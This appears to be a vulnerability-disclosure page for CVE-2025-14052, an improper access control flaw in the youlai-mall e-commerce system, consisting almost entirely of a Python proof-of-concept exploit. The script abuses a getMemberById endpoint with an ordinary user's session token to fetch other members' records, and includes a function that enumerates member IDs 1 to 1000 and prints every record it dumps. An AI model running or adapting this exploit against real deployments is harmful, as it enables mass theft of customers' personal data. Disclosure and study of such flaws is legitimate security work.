CVE-2025-14052 | youlai-mall 不当访问控制漏洞

#!/usr/bin/env python3 """ CVE-2025-14052 PoC - youlai-mall Improper Access Control Vulnerability in getMemberById function """ import requests import json TARGET_URL = "http://target-server/mall-ums/app-api/v1/members/" def exploit_cve_2025_14052(session_token, target_member_id): """ Exploit the improper access control vulnerability Args: session_token: Valid session token for authenticated user target_member_id: Member ID to retrieve information for Returns: dict: Retrieved member information """ headers = { "Authorization": f"Bearer {session_token}", "Content-Type": "application/json" } # Craft the malicious request payload = { "memberId": target_member_id } # Send the request to exploit the vulnerability response = requests.post( TARGET_URL + "getMemberById", json=payload, headers=headers ) if response.status_code == 200: return response.json() else: return {"error": f"Request failed with status {response.status_code}"} def enumerate_member_ids(session_token, start_id=1, end_id=1000): """ Enumerate and dump all member information Args: session_token: Valid session token start_id: Starting member ID end_id: Ending member ID """ results = [] for member_id in range(start_id, end_id + 1): member_info = exploit_cve_2025_14052(session_token, member_id) if "error" not in member_info: results.append(member_info) print(f"[*] Dumped member ID {member_id}: {member_info}") return results if __name__ == "__main__": # Example usage SESSION_TOKEN = "your_session_token_here" TARGET_MEMBER_ID = 2 print(f"[*] Exploiting CVE-2025-14052 on {TARGET_URL}") result = exploit_cve_2025_14052(SESSION_TOKEN, TARGET_MEMBER_ID) print(f"[+] Result: {json.dumps(result, indent=2)}")